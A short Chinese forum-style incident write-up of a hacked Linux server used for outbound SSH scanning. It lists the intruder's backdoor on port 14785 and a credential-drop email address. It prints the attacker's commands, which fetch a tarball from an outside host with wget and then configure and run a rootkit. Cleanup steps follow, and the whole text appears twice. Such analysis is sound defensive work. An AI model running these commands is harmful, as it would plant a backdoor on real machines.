您当前的位置: 首页 » Linux网络/硬件 » 分析一台被入侵的linux服务器
分析一台被入侵的linux服务器
论坛链接
客户反映一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下
黑客进入服务器后所做的操作:
1. 向/var/tmp/下上传了两个恶意程序
其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到[email]diavolu_gol@yahoo.com[/email]这个邮箱。
2. 入侵者登陆记录
85.120.78.140的IP来自罗马尼亚。
3. wget
wget adelinuangell.lx.ro/ryo.tar
tar xvf ryo.tar
cd .access.log
./config Ady 14785
./run
结束进程。删掉程序。。删掉用户。修改root密码。
黑客进入服务器后所做的操作:
1. 向/var/tmp/下上传了两个恶意程序
其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到[email]diavolu_gol@yahoo.com[/email]这个邮箱。
2. 入侵者登陆记录
85.120.78.140的IP来自罗马尼亚。
3. wget
wget adelinuangell.lx.ro/ryo.tar
tar xvf ryo.tar
cd .access.log
./config Ady 14785
./run
结束进程。删掉程序。。删掉用户。修改root密码。